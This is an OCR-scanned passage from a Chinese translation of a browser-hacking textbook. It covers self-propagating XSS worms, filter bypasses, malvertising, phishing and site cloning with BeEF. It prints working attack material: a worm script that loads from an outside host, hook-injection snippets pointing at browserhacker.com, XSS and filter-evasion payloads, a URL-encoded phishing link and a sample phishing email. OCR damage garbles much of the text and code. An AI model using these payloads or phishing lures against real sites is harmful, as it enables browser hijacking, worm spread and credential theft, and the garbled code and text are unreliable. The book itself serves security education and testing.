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应 用 和 浏览 器 具备 某 种 条 件 的 情况 下 ， 代 码 的 自传 播 就 可 能 发 生 。 

这 份 研究 讨论 了 一 种 情况 ， 即 存储 型 XSS 一 旦 奏效 ， 有 可 能 导致 ( 受 影响 源 的 ) 后 续 访 问 者 
也 会 执行 恶意 JavaScript。 结 果 就 是 目标 浏览 右 会 尝试 对 其 他 Web 应 用 执行 XSS。 相 应 XSS 的 攻击 
代码 如 下 : 


<iframe name="iframex" id="iframex" src="hidden" style="display:none"> 
</iframe> 
<script SRC="http://browserhacker.com/xssv.js"></script> 


xssv.js 文 件 的 内 容 如 下 : 


function loadIframe(iframeName, url) { 
if ( window.frames[iframeName] ) { 
window.frames[iframeName].location = url; 
return false; 
} 
else return true; 


} 























function do_request() { 
var ip = get_random_ip(); 
var exploit string = '<iframe name="iframe2" id-"iframe2" ' + 


'src="hidden" style="display:none"></iframe> ' + 
‘<script src="http://browserhacker.com/xssv.js"></script>'; 


loadIframe('iframe2', 
"http://" + ip + "/index.php?param=" + exploit string); 
j 


function get random() 

{ 
var ranNum- Math.round(Math.random()*255); 
return ranNum; 


function get random ip() 





return "10.0.0."«get random(); 


setInterval("do request()", 10000); 

可 以 看 到 ,这 里 的 JavaScript 会 定时 执行 4o_request () ， 这 个 方法 基于 1oadqIframe () 方 法 
随机 向 不 同 的 主机 发 动 XSS 攻 击 , get_random_ip () #llget_random O 图 数 用 于 产生 随机 了。 随 
后 只 要 访问 被 修改 网 页 的 浏览 器 ， 都 会 依次 展开 随机 攻击 。 

这 种 恶意 JavaScript 自 动 传播 的 特点 ， 对 浏览 器 来 说 意味 着 很 多 可 能 性 。 在 Alcorn 的 演示 中 ， 
攻击 的 发 起 不 依赖 任何 用 户 交 互 , 只 要 用 户 在 浏览 器 中 打开 网 页 就 够 了 。 打开 相应 网 页 的 浏览 
随后 就 会 执行 命令 ， 然 后 一 直 继续 下 去 。 

攻击 代码 本 身 会 自动 传播 并 自动 终止 。 但 正如 后 面 几 章 会 讲 到 的 , 在 此 期 间 被 执行 的 恶意 活 
动 次 数 是 没有 穷尽 的 。 
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(1) Samy 

Alcorn 假 想 的 攻击 人 研究， 是 在 不 久 前 Samy Kamkar 声 名 狼藉 地 感染 100 多 万 MySpace 用 户 的 
"Samy Worm” 之 后 展开 的 。 很 多 安全 专家 认为 “Samy Worm" 的 感染 速度 前 所 未 有 ， 前 24 小 时 
就 达到 了 100 万 。 

不 过 请 大 家 注意 ，XSS 病 毒 的 传播 与 传统 计算 机 病毒 传播 没有 可 比 性 。 特 别 是 在 XSS 病 毒 并 
不 会 在 受 感染 浏览 器 中 留 下 有 条 件 可 执行 文件 的 情况 下 ， 更 是 如 此 。 

Samy Worm 使 用 了 一 些 技术 绕 过 MySpace 的 防御 手段 。 概 括 来 说 ， 包 括 如 下 几 种 。 
O 通过 div 的 packgroundq:ur1 参 数 执行 初始 的 JavaScript， 针 对 IE5 和 IE6: 






























































«div style="background:url ('javascript:alert(1)')"> 

O 通过 把 代码 转移 到 其 他 地 方 , 然后 通过 style 属 性 运行 指令 , 绕 过 单 引 号 和 双 引 号 转 义 问 
题 : 
<div 


id="mycode" expr-"alert('hah!')" 
style="background:url ('javascript:eval (document.all.mycode.expr)')" 
> 


Q wiht AMRIT AF On) 绕 过 对 javascript 这 个 词 的 过 滤 

口 使 用 string.fromcharCcode() 方 法 插入 双 引 号 

a 使 用 eval () 方 法 绕 过 其 他 黑 名 单 中 的 关键 词 : 
eval('xmlhttp.onread' + 'ystatechange = callback'); 

要 查看 完整 代码 及 介绍 ， 请 访问 这 个 网 址 : http://mamb.la/popular/tech.html。 

(2) Jikto 

就 在 最 初 的 XSS 传 播 研究 发 布 两 年 之 后 , 也 就 是 2007 年 , Hoffman 在 ShmooCon 上 展示 了 Jikto。 
Jikto 是 一 个 演示 工具 ,演示 了 未 修复 XSS 缺 陷 的 影响 ， 以 及 在 浏览 絮 中 执行 攻击 者 控制 的 代码 时 
会 发 生 什么 。 

Jikto 的 设计 理念 是 静默 地 开启 一 个 JavaScript 循 环 ， 要 么 像 Samy 一 样 尝试 自传 播 ， 要么 向 一 
个 中 心服 务 器 索要 下 一 步 的 指令 。 相 对 之 前 的 XSS 自 传播 研究 而 言 ，Jikto 更 进 了 一 步 。 虽 然 Jikto 
的 代码 是 内 部 代码 ， 但 后 来 也 泄漏 了 ， 而 且 有 人 开始 将 它 用 于 互联 网 。 

Jikto 最 值得 关注 的 一 个 进步 ， 就 是 它 绕 过 SOP 的 方法 。 它 会 通过 一 个 代理 ( 或 跨 域 的 桥梁 ) 
同时 加 载 Jikto 代 码 和 目标 源 的 内 容 ， 把 它们 放 到 同一 个 源 下 面 。 最 早 使 用 的 是 Google Translate 作 
为 不 同 请 求 的 代理 ， 但 Jikto 也 可 以 修改 使 用 其 他 代理 。 要 想 获 得 Jikto 的 代码 ， 请 访问 
phttps:/browserhacker.com。 

(3) 最 小 XSS 蠕 虫 大 赛 

到 了 2008 年 ，XSS 病 毒 和 蠕虫 的 概念 已 经 尽 人 皆 知 ， 安 全 社区 里 也 不 断 讨论 。 自 此 以 后 ， 摆 
在 人 们 面前 的 问题 就 是 怎么 优化 并 找到 构建 这 些 自 传播 代码 的 最 有 效 方式 。 

Robert Hansen 在 2008 年 举办 的 最 小 蠕虫 大 赛 (Diminutive XSS Worm Replication Contest of 
2008 ) “就 是 这 么 一 次 尝试 。 这 次 大 赛 的 目标 就 是 找到 一 种 方法 ， 使 用 尽 可 能 少 的 代码 ， 构 建 一 
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个 能 够 自 复 制 的 HTML 或 JavaScript 片 段 ， 通 过 POST 请 求 复 制 执行 标准 的 alert 对 话 框 脚本 。 

获胜 者 Giorgio Maone 和 Eduardo Vela 提 交 了 非常 近似 的 方案 。 他 们 构建 的 片段 都 只 有 161 字 
节 ， 通 过 POST 请 求 复制 自身 到 一 个 PHP 文 件 。 复 制 后 大 小 不 会 增加 ， 不 需要 用 户 交 互 ， 甚 至 不 
需要 任何 cookie 数 据 : 


<form> 

<input name="content"> 
<img src="" 
onerror-"with(parentNode) 




















alert('XSS',submit(content.value-'«form»'-« 
innerHTML.slice(action=(method='post')+ 
'.php',155))) "'» 
还 有 
<form> 
<INPUT name="content"> 
<IMG src="" onerror-"with(parentNode) 
submit (action= (method='post')+ 
'.php',content.value-'«form»'-« 
innerHTML.slice(alert('XSS'),155))"> 


可 以 很 清楚 地 看 到 ， 利 用 这 个 常见 的 Web 应 用 缺陷 嵌入 初始 恶意 脚本 的 逻辑 有 多 险恶 。 虽 然 
我 们 力求 全 面 总 结 各 种 XSS, 但 新 的 攻击 形式 仍然 层出不穷 , 而 这 正 是 Web 安 全 领域 的 一 大 特色 。 

DOM 型 和 通用 型 XSS 就 是 后 来 才 出 现 的 XSS 攻 击 形式 。 与 此 同时 ， 随 着 互联 网 、HTML 及 浏 
览 器 功能 的 不 断 增强 , 我 们 相信 , 作为 一 种 执行 内 容 的 奇特 而 又 奇妙 的 方式 , XSS 仍 将 长 期 存在 。 

6. 绕 过 XSS 防 御 机 制 

下 面 我 们 简单 介绍 一 下 绕 过 XSS 防 御 机 制 的 技术 。 后 面 ， 在 本 书 第 3 章 ， 我 们 还 将 深入 探讨 
模糊 恶意 代码 的 辅助 技术 。 

前 面 展示 的 大 多 数 XSS 示 例 都 有 一 个 前 提 ， 就 是 作为 攻击 者 的 你 不 会 遇 到 任何 限制 ， 就 可 以 
提交 恶意 JavaScript。 而 在 现实 当中 , 通常 却 不 是 这 种 情况 。 目 标 浏览 器 中 会 有 很 多 障碍 阻止 你 执 
行 攻击 代码 。 

我 们 所 说 的 障碍 有 很 多 种 , 包括 被 注入 上 下 文 的 限制 , 浏览 器 间 的 语言 差异 , 浏览 器 内 置 的 
安全 机 制 ， 甚 至 Web 应 用 的 防御 手段 。 有 一 天 ， 当 你 真正 开始 XSS 攻 击 的 征程 之 时 ， 会 发 现 要 攻 
克 这 些 障碍 都 是 家 常 便 饭 。 

(1) 绕 过 浏览 器 XSS 防 御 机 制 

除了 执行 JavaScript 时 可 能 会 遇 到 的 问题 , 现代 浏览 器 中 内 置 的 XSS 防 御 机 制 也 是 重要 的 客户 
端 屏障 。 这 些 防 御 手 段 都 是 为 了 降低 XSS 攻 击 代 码 在 目标 浏览 器 中 执行 的 可 能 性 ， 比 如 Chrome 
和 Safari 的 XSS Auditor、IE 的 XSS 过 滤器 ， 以 及 Firefox 的 NoScript 扩 展 。 

有 一 种 绕 过 XSS 过 滤器 的 技术 吊 mXSS ( mutation-based Cross-site Scripting， 基 于 变异 的 XSS ) *, 
它 依赖 于 浏览 需 对 输入 优化 后 产生 的 变异 。 这 种 方法 只 有 在 浏览 句 优 化 你 的 输入 时 才 起 作用 。 换 
名 话说 ， 开 发 者 必须 使 用 innerHTML 或 类 似 方式 解析 你 的 输入 。 
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关键 是 你 的 输入 会 以 某 种 方式 被 优化 处 理 。 以 下 代码 演示 了 mXSS 的 工作 原理 : 


// attacker input to innerHTML 
<img src-"test.jpg" alt=" ~onload=xss()" /> 


// browser output 
«IMG alt-""onload-xss() src="test.jpg"> 


这 个 例子 中 的 重点 ， 在 于 使 用 重音 符 (、) 绕 过 IE 的 XSS 过 滤器 。 浏 览 器 对 这 个 示例 代码 优 
化 的 结果 ， 就 是 执行 onloaq 属 性 的 值 。 

(2) 绕 过 服务 器 XSS 防 御 机 制 

XSS 过 滤 并 非 仅 限于 客户 端 。 事 实 上 ，Web 应 用 一 直 以 来 都 用 过 滤 来 应 对 Web 隐 患 。 最 完备 
的 情况 下 ，Web 应 用 中 的 XSS 防 范 措 施 会 涉及 输入 过 滤 和 输出 编码 。 

个 例子 是 绕 过 微软 的 .NET Framework, .NET Framework 内 置 很 多 方法 , 让 开发 人 员 能 够 降 

低 服 务 器 解析 恶意 代码 的 可 能 性 , 包括 RequestValidator 类 ,但 其 早期 的 防范 措施 也 不 是 十 分 有 效 ， 
比如 提交 下 面 任 何 一 行 代 码 都 可 以 绕 过 其 过 滤器 : 


<~/XSS/*-*/STYLE=xss:e/**/xpression(alert (6))> 
<%tag style-"xss:expression(alert(6))"» 


这 两 个 例子 利用 的 都 是 expression() ， 它 是 微软 Dynamic Properties 的 一 部 分 。 这 个 新 功能 
用 于 在 CSS 中 提供 动态 属性 。 
除了 从 源头 上 修复 这 些 问 题 , 安全 提供 商 也 很 快 拿 出 了 应 对 非 隐患 应 用 的 自动 修复 方案 。 这 
些 方案 可 见于 Web Application Firewalls ( WAF ) 等 设备 ， 或 者 执行 同样 任务 的 软件 过 滤器 。 无 论 
什么 情况 ， 以 及 实现 技术 及 过 程 如 何 , 目标 始终 与 客户 端 防范 机 制 是 一 致 的 ， 即 尽 可 能 降低 攻击 
者 利用 这 些 隐 患 的 可 能 性 。 

这 些 技 术 效 果 非 常 好 ,所 有 攻击 者 都 只 能 打道 回 府 ,而 WAF 技 术 被 视 为 防范 所 有 Web 隐 患 的 
灵 和 丹 妙 药 。 没 错 ， 是 真 的 有 圣诞 老人 ! 好 吧 ， 实 际 上 ， 在 面 对 挑 战 时 ， 黑 客 们 总 能 攻坚 克 难 ”。 
与 绕 过 客户 端 防御 机 制 类 似 ， 绕 过 服务 右 端 防御 机 制 的 代码 及 方法 很 快 也 被 开发 出 来 。 

WAF (或 相关 ) 技术 使 用 一 个 常见 的 技巧 来 过 滤 恶 意 代码 , 包括 对 超出 上 下 文 或 可 疑 括 号 的 
检测 。Gareth Heyes 在 2012 年 提出 的 技术 "就 是 成 功 绕 过 服务 器 端 防御 的 一 个 绝 佳 例子 ， 它 会 在 
DOM 对 象 windqow 上 附加 一 个 〈 不 带 括 号 的 ) 错误 处 理 程序 ， 然 后 立即 抛 出 : 


onerror=alert;throw 1; 
onerror=eval;throw'=alert\x281\x29'; 


这 两 种 情况 都 不 包含 可 疑 的 括号 。 但 为 了 起 作用 ， 必 须 通 过 一 个 HTML 元 素 的 属性 把 它们 注 
入 进去 。 


XSS 备 忘 录 


好 吧 ， 我 们 承认 ,假如 你 并 非 资深 的 程序 员 或 者 JavaScript 黑 客 ， 那 前 面 的 例子 一 定 会 让 
你 愁 容 满面 ， 而 且 紧 握 的 岸 头 里 可 能 已 经 满 是 急 不 可 耐 的 汗水 ! 
请 放宽 心 。 实 际 上 , 很 多 时 候 ， 就 算是 对 一 个 攻击 者 或 测试 员 来 说 ， 要 记 住 所 有 绕 过 XSS 
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过 滤器 的 方法 也 是 不 现实 的 。 

在 这 里 ， 我 们 向 大 家 推荐 一 个 著名 的 Robert Hansen ( RSnake ) 原创 的 XSS 备 忘 录 ， 这 份 备 
忘 录 已 经 捐献 给 了 OWASP， 可 以 通过 这 个 网 址 访问 : https://www.owasp.org/index.php/XSS _ 
Filter Evasion Cheat Sheet。 

对 HTML5 引 入 的 大 批 新 特性 而 言 ， 攻 击 浏览 器 的 各 种 新 方法 和 新 属性 也 会 陆续 现 身 。 
Mario Heiderich 已 经 发 表 了 一 份 HTMIL5 安 全 备忘录 : http://html5sec.org/。 
除了 这 些 备忘录 ， 还 有 很 多 组 合 方法 涵盖 了 攻击 代码 的 转换 、 编 码 、 组 合 和 模糊 。 这 里 也 
推荐 一 些 相 关 方 法 。 
口 Burp Suite 的 Decoder feature 
口 Gareth Hayes 的 Hackvertor: https://hackvertor.co.uk/public 
口 Mario Heiderich 的 Charset Encoder: http://yehg.net/encoding/ 





2.2.2 ”使 用 有 隐患 的 Web 应 用 


攻击 者 获取 对 浏览 器 访问 权 的 一 种 常见 方式 ,就 是 借助 对 Web 应 用 的 未 授权 访问 。 获 取 该 访 
问 权 之 后 ， 攻 击 者 可 能 会 修改 网 页 内 容 以 包含 恶意 代码 。 

利用 Web 应 用 可 能 涉及 各 种 攻击 ， 包 括 利 用 SQL 注 入 或 远程 代码 执行 。 另 一 种 控制 Web 应 用 
的 方法 ， 是 获取 对 FTP、SFTP 或 SSH 等 管理 性 服务 的 直接 未 授权 访问 ,但 这 些 内 容 已 经 超出 本 书 
所 要 讨论 的 范围 。 

获得 访问 权 之 后 ,就 可 以 把 任意 内 容 插 入 目标 Web 应 用 。 插 入 的 内 容 可 能 会 在 任何 浏览 器 中 
运行 , 取决 于 Web 应 用 的 用 户 使 用 了 什么 浏览 器 ,而 这 就 为 在 目标 浏览 器 中 插入 即将 执行 的 指令 ， 
以 获取 其 初始 控制 权 ， 提 供 了 理想 的 突破 口 。 

控制 有 大 量 用 户 访问 的 Web 应 用 的 来 源 ， 会 获得 大 量 目标 浏览 需 。 可 挖 浏览 央 越 多 ， 攻 击 成 
功率 就 越 高 。 当 然 ， 攻 击 到 什么 阶段 ， 还 要 看 用 户 交 互 的 深度 。 


2.2.3 ”使 用 广告 网 络 


在 线 广告 网 络 会 在 互联 网 上 星罗棋布 的 众多 网 站 中 显示 横幅 广告 。 可 能 很 少 有 人 会 思考 这 些 
广告 里 到 底 都 包含 着 什么 。 不 必 多 言 ,最 重要 的 就 是 广告 中 运行 着 你 提供 的 代码 。 这 里 有 一 个 你 
会 感 兴趣 的 用 例 ! 

利用 广告 网 络 可 以 在 很 多 浏览 如 中 运行 你 的 初始 控制 代码 。 当 然 , 你 首先 得 注册 , 通过 所 有 
相关 审核 。 而 一 旦 完成 ， 花 点 小 钱 ， 就 会 有 机 会 控制 大 量 浏览 句 。 记 住 ， 不 可 能 只 以 茶 个 浏览 名 
为 目标 ， 因 为 初始 代码 的 执行 会 随机 发 生 在 各 种 源 。 

但 作为 专业 攻击 来 说 , 不 可 能 希望 在 随机 出 现 的 浏览 器 中 寻找 目标 。 我 们 希望 的 是 寻找 来 自 
某 个 或 蘑 组 IP 地 址 的 浏览 右 请 求 。 而 这 可 能 需要 配置 一 个 BeEF 之 类 的 框架 , 本 书后 面 将 详细 介绍 


这 个 框架 。 
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有 时 候 , 可 能 你 想 要 攻击 的 是 一 个 安全 的 源 。 所 谓 安 全 ， 就 是 不 仅仅 在 认证 页 面 中 使 用 广告 
提供 商 。 此 时 ， 可 以 注册 该 广告 提供 商 ， 然 后 使 用 下 列 代码 ， 只 在 目标 源 中 执行 指令 。 


if (document.location.host.indexOf("browservictim.com") >= 0) 


{ 

















var scr = document.createElement ('script') 

Scr.setAttribute('src','https://browserhacker.com/hook.js'); 

document.getElementsByTagName('body').item(0).appendChild(scr); 
} 


使 用 前 面 的 代码 ， 可 以 检查 来 源 ， 看 它 是 不 是 正确 的 日 标 , 然后 再 动态 加 载 脚本 。 如 果 不 查 
看 源 代 码 , 这 个 脚本 对 其 他 域 是 不 可 见 的 .WhiteHat Security 的 Jeremiah Grossman 和 Matt Johansen, 
在 BlackHat 2013 展 示 了 类 似 的 攻击 技术 "。 他 们 的 研究 涉及 购买 合法 的 广告 ， 而 广告 中 包含 他 们 
PERIJA JavaScript 


2.2.4 使 用 社会 工程 攻击 


社会 工程 是 一 系列 方法 的 统称 ， 这 些 方法 的 目标 是 强迫 某 人 执行 某 些 操作 或 者 透露 某 些 信 
息 。 在 安全 链条 中 ， 人 的 环节 一 直 被 认为 是 最 薄弱 的 。 从 社会 互动 诞生 之 日 起 ， 虎 视 上 耽 的 敌人 
就 开始 利用 这 一 点 了 。 
WE, 人 们 通常 把 社会 工程 看 作 某 种 形式 的 欺骗 或 欺诈 。 而 在 今天 的 数字 领域 中 , 社会 工程 
往往 意味 着 更 直接 的 关系 ， 但 不 一 定 依赖 和 受害 者 面对面 的 交互 。 

金融 行业 是 一 个 受害 相对 严重 的 领域 。 行 骗 者 会 编造 数字 伎俩 套 取 客 户 的 银行 交易 赁 证, 然 
后 转移 盗 取 的 资金 。 垃 圾 邮件 和 钓鱼 网 站 是 这 些 行 骗 者 最 常用 的 一 个 组 合 技术 。 


垃圾 邮件 与 钓鱼 


“垃圾 邮件 ”(SPAM ) 和 “钓鱼 ”经 常 作为 同义词 被 人 混用 。 在 本 书 中 ， 我 们 说 的 垃圾 邮 
件 指 的 是 来 路 不 明 的 电子 邮件 ,通常 是 一 批 一 批发 送 的 推销 真实 (有 时 也 不 是 真实 ) 的 商品 和 
服务 的 邮件 。 而 钓鱼 则 是 一 种 直接 获取 信息 (通常 是 用 户 名 和 密码 ) 的 手段 ， 获 取 到 的 信息 可 
能 被 拿 到 黑市 上 售卖 ， 也 可 能 直接 被 用 来 欺骗 受害 者 。 

钓鱼 需要 多 个 部 分 协同 配合 , 包括 伪造 的 网 站 、 伪造 的 邮件 , 有 时 候 还 有 伪造 的 即时 消息 。 
钓鱼 邮件 与 垃圾 邮件 的 策略 通常 是 一 样 的 ， 即 意图 引诱 受害 者 访问 伪造 的 网 站 。 

鱼 又 式 钓 鱼 是 一 种 与 常规 钓鱼 类 似 的 技术 , 但 不 同 的 是 ， 它 的 目标 不 是 大 量 受 害 者 , 而 是 
少数 受害 者 。 因 此 鱼 又 式 钓 鱼 可 以 收集 更 多 受害 者 的 背景 信息 ,进而 精细 准备 诱 饰 ， 从 而 达到 
更 有 效 欺 骗 受 害 者 的 目的 。 

有 人 记得 2011 年 的 RSA 破 坏 吗 ? 那 次 破坏 的 初始 阶段 就 是 针对 两 组 不 同 的 人 分 别 实施 鱼 
又 式 钓鱼 。 而 电子 邮件 的 附件 中 包含 对 微软 Excel 的 0 日 攻击 。 更 多 内 容 可 以 参考 http://blogsrsa. 
com/anatomy-of-an-attack/ X, Zt http://www.theregister.co.uk/2011/03/18/rsa breach leaks securid data/。 





















































































































































利用 钓鱼 技术 在 目标 组 织 的 网 络 中 建立 一 个 攻击 阵地 , 非常 类 似 骗 子 行 骗 的 节奏 ， 只 不 过 你 
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想 要 的 不 是 只 获得 一 些 重要 凭据 或 其 他 信息 ， 而 是 试图 在 目标 浏览 器 中 注入 自己 的 指令 。 

接 下 来 几 节 将 深入 讨论 一 些 常用 的 方法 。 这 些 方法 演示 了 怎么 强制 目标 的 浏览 需 执 行 攻击 
代码 。 

1. 钓鱼 攻击 

如 前 所 述 , 钓鱼 攻击 一 直 是 行 骗 者 获得 用 户 在 线 凭证 的 一 种 方法 。 钓鱼 攻击 的 目标 包括 在 线 
银行 门户 、PayPal 、eBay， 其 至 税务 部 门 。 钓 鱼 攻 击 的 形式 多 种 多 样 ， 主 要 有 以 下 几 种 。 
a 电子 邮件 钓鱼 。 向 多 个 收 件 人 群发 一 封 邮 件 ， 要 求 受害 人 回复 对 攻击 者 有 价值 的 信息 。 
这 种 技术 也 用 于 通过 链接 或 附件 分 发 恶意 软件 。 图 2-1 展 示 了 一 封 钓鱼 邮件 。 
口 网 站 钓鱼 。 在 网 上 伪造 一 个 网 站 ,模仿 某 个 合法 网 站 。 为 了 欺骗 用 户 访问 这 个 网 站 ， 骗 
子 还 会 采取 辅助 技术 ， 比 如 钓鱼 邮件 、 即 时 消息 、 短 信 ， 甚 至 打 电 话 。 
口 鱼 叉 式 钓鱼 。 经 常 也 要 使 用 一 个 欺骗 性 网 站 ， 但 诱饵 只 针对 一 小 群 目 标 受众 。 
O 鲸 钓 。 指 的 是 目标 为 高 端 人 物 或 高 级 管理 人 员 的 鱼 又 式 钓鱼 。 


= TrustedBank” 


Dear valued customer of TrustedBank, 





















































We have recieved notice that you have recently attempted to withdraw the 
following amount from your checking account while in another country: $135.25. 


If this information is not correct, someone unknown may have access to your 
account. As a safety measure, please visit our website via the link below to verity 
your personal information 


http://www trustedbank.com/general/custverifyinfo asp 





Once you have done this, our fraud department will work to resolve this 
discrepency. We are happy you have chosen us to do business with. 


Thank you, 
TrustedBank 








Member FDIC © 2005 TrustedBank, Inc 

















图 2-1 钓鱼 电子 邮件 


在 目标 浏览 器 中 ,你 的 首要 目的 是 让 它 执 行 你 的 代码 。 因 此 , 我 们 不 讨论 纯粹 的 电子 邮件 钓 
鱼 和 其 他 与 浏览 器 无 关 的 社会 工程 手段 。 

(1) 第 一 阶段 : 伪造 网 站 

钓鱼 攻击 的 第 一 步 就 是 伪造 一 个 网 站 , 在 其 中 隐藏 你 的 恶意 代码 。 视 情况 不 同 ， 这 个 伪造 的 
网 站 可 以 是 一 个 完全 虚构 的 网 站 ， 也 可 以 模仿 一 个 合法 的 网 站 。 比 如 ， 你 想 攻击 一 家 能 源 公 司 ， 
就 不 会 去 伪造 一 个 网 上 银行 的 门户 网 站 ,而 是 伪造 一 个 与 能 源 产业 利益 相关 的 网 站 ， 比 如 某 能 源 
管理 机 构 的 网 站 。 

至 于 是 伪造 一 个 单 页 网 站 , 还 是 多 弄 几 个 页 面 , 也 取决 于 你 自己 。 假 如 你 想 避 免 目 标 用户 联 
想到 “钓鱼 "， 那 最 好 多 弄 几 个 页 面 ， 把 内 容 也 准备 得 充分 一 些 。 不 过 ， 就 一 个 页 面 也 足够 在 浏 

































































2.2 ”实现 初始 控制 37 





览 器 中 执行 你 的 初始 化 JavaScript 代 码 了 。 
决定 了 伪造 什么 网 站 之 后 ， 接 下 来 就 要 考虑 怎么 构造 必要 的 HTML 和 相关 文件 。 以 下 是 几 种 

可 能 的 选择 。 

a 自己 从 头 开始 构建 网 站 。 这 种 做 法 对 鱼 又 式 钓 鱼 有 利 ， 就 是 比较 费时 间 。 

口 复制 并 修改 已 有 站 点 。 与 自己 从 头 开 始 构建 网 站 类 似 ， 但 可 以 利用 网 上 现成 的 内 容 。 大 
多 数 现代 浏览 器 都 支持 把 当前 正在 浏览 的 网 页 保存 为 HTML 文件, 这 样 可 以 加 快 制作 内 容 
的 进度 。 保 存 后 ， 就 可 以 直接 修改 HTML 中 的 页 眉 和 标题 字段 。 

口 克隆 已 有 站 点 。 与 复制 并 修改 已 有 站 点 类 似 ， 只 是 连 保存 和 修改 内 容 都 不 必 了 ， 结 果 与 

已 有 站 点 完全 一 模样 。 

OQ 显示 错误 页 面 。 某 些 情 况 下 ， 其 实 只 要 显示 一 个 错误 页 面 就 足够 了 。 结 果 页 面 虽然 显示 
的 是 服务 器 错误 ,但 实际 上 则 是 在 其 掩护 下 通过 浏览 器 执行 你 的 代码 。 

还 记得 本 章 前 面 讨论 的 所 有 XSS 方 法 吗 ?” 要 进行 钓鱼 攻击 ,通常 不 必 构 建新 网 站 。 如 果 你 前 

期 对 目标 Web 应 用 做 过 侦察 , 而 且 发 现 了 其 中 存在 的 XSS 隐 患 , 就 可 以 将 那个 站 点 作为 钓鱼 网 站 。 

这 种 方法 的 好 处 在 于 通过 熟悉 的 URL 把 人 引导 至 钓鱼 网 站 , 基本 不 会 引起 怀疑 。 这 也 可 以 为 

你 的 鱼 义 式 钓鱼 做 掩护 。 假设 你 发 现 了 一 个 目标 网 站 的 XSS 缺 陷 , 而 且 可 以 使 用 URL 编 码 你 的 代 

码 ， 就 可 以 在 钓鱼 邮件 里 让 用 户 提 交 这 样 的 链接 ( 仅 在 Firefox 中 有 效 )。 


“Hi IT Support, 























































































































I’ve been browsing your website and I’ve noticed a weird error message when I performa 
search. After I click the ‘Search’ button I end up on this page: 
http: //browservictim.com/search. aspx?q=%3c%73%63%72%69%70%74%20 
%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%73%65%72 


$76$652$72$2e$63$6f$63092f£$682$6f$6f2$6b2$2e$6a$73$27$3e$3c$2£9$73$63$72$69 
$702$74$3e 


I'm unsure if this is something wrong with my computer or if you guys are havingan issue? 
Kind Regards, 
Joe Bloggs" 

其 中 链接 内 编码 的 参数 实际 上 是 这 样 的 : 


<script src='http://browserhacker.com/hook.js'></scrip> 


如 何 克 隆 网 站 
克隆 网 站 的 方法 有 很 多 。 
可 以 使 用 wget 命 令 行 工 具 在 本 地 克隆 一 个 网 站 。 例 如 : 


wget -k -p -nH -N http://browservictim.com 
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码 ， 


bs 


S 个 命令 的 参数 表示 如 下 含义 。 


-p: 下 载 所 有 必要 文件 ， 确 保 离 线 可 用 ， 包 括 图 片 和 样式 表 。 
-nH: 禁止 把 文件 下 载 到 以 主机 名 为 前 级 的 文件 夹 中 。 
-N: 启用 文件 的 时 间 戳 ， 以 匹配 来 源 的 时 间 玲 。 





[Ej (Ej (Bl fti 


-k: 把 已 下 载 文件 中 的 所 有 链接 都 转换 为 本 地 引用 ， 不 再 依赖 原始 或 在 线 内 容 。 


BeEF 的 社会 工程 扩展 中 内 置 了 Web 克 ror 能 ,这 个 框架 默认 会 在 被 克隆 的 网 站 内 容 中 注入 
JavaScript 连 接 代码 。 要 利用 这 个 功能 ， 通过. /beef 运 行 BeEF， 然后 在 相应 终端 


以 使 用 BeEF 的 REST 风 格 API: 


curl -H "Content-Type: application/json; charset=UTF-8" 

-d '{"url":"<URL of site to clone>", "mount":"<where to 
mount>"}' 
-X POST http://<BeEFURL>/api/seng/clone_page?token=<token> 


执行 之 后 ，BeEF 控 制 台 会 显示 : 
风光 el 二 | 四 | 


图 2-2 展 示 了 一 个 BeEF 控 制 台 输出 的 截图 。 


中 执行 以 下 代 


然后 ， 可 以 通过 http://<BeEFURL>/<where to moun 人 > 访问 克隆 的 网 站 。 安 装 位 置 也 可 以 是 
网 站 的 根 目录 。 还 可 以 把 这 些 位 于 BeEF 的 cloned pages 文 件 夹 中 的 文件 上 传 到 
隆 的 网 站 进行 定制 : 


beef/extensions/social_engineering/web_cloner/cloned_pages/<dom>_mod 





[17:36:55] | Hook URL: http://127.8.8.1:38088/hook .js 
[17:36:55] |. UIURL:  http://127.8.8.1:3088/ui/panel 
[17:36:55] [+] running on network interface: 192.168.1.1 
[17:36:55] | Hook URL: http://192.168.1.1:3880/hook.js 
[17:36:55] |. UI URL:  http://192.168.1.1:38880/ui/panel 


[17:36:55][*] RESTful API key: 1f935fe1136598220482180c5bb26668487d7369a 
[17:36:55][*] HTTP Proxy: http://127.8.8.1:6789 

[17:36:55] [*] BeEF server started (press control«c to stop) 
[17:38:22][*] Cloning page at URL http://www.beefproject .com/ 
--28013-803-83 17:38:22-- http://www.beefproject.com/ 

Resolving www.beefproject.com... 213.165.242.18 

Connecting to www.beefproject.com|213.165.242.18|:880... connected. 

HTTP request sent, awaiting response... 288 OK 

Length: 7637 (7.5K) [text/html] 

Saving to: */Users/xian/beef /beef /extensions/social. engineering/web. c Loner/c Loned. pages/www .beef pro 
ject.com' 


106%[======================================>] 7,637 --.-K/s in 8.882s 


2013-03-03 17:38:24 (3.11 MB/s) - "/Users/xian/beef /beef /extensions/social_engineering/web_cloner/c 
loned pages/www.beefproject.com' saved [7637/7637] 


Converting /Users/xian/beef /beef /extensions/social engineering/web. c Loner/c Loned. pages/www .beef proj 
ect.com... 8-18 

Converted 1 files in 8.881 seconds. 

[17:38:24] [*] BeEF hook added :-D 


[17:38:24][*] Page at URL [http://www.beefproject.com/] has been cloned. Modified HTML in [cloned p 


aged/www .beef project .com mod] 
[17:38:25][*] Page can be framed: [true] 
17:38:25]|*] Mounting cloned page on URL [/project] 








图 2-2 ”BeEF 成 功 克 隆 网 站 后 的 输出 


不 管用 什么 方法 构建 HTML， 最 重要 的 还 是 要 把 包含 初始 代码 的 钓鱼 内 容 藏 


进 


其 他 地 方 ， 对 克 


。 如 果 你 使 
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用 了 BeEF 的 社会 工程 扩展 ,一切 就 自动 化 了 。 和 否则 ， 就 必须 得 更 新 HTML。 不 过 也 很 简单 ， 基 
上 就 是 在 关闭 的 </body> 标 签 前 面 插 入 类 似 如 下 的 一 行 代码 : 

<script src=http://browserhacker.com/hook.js></script> 

在 需要 通过 互联 网 访问 钓鱼 内 容 的 情况 下 , 需要 考虑 把 Web 应 用 托管 到 什么 地 方 。 近 几 年 来 ， 
在 线 虚 拟 主机 的 价格 一 直 持续 走低 。Amazon 最 低 配 置 的 计算 单元 收费 只 要 每 小 时 0.02 美 元 (2013 
年 的 价格 ， 不 含 数据 存储 和 流量 收费 )。 如 果 你 的 钓鱼 时 间 需 要 40 小 时 ， 总 成 本 也 不 到 1 美元 。 
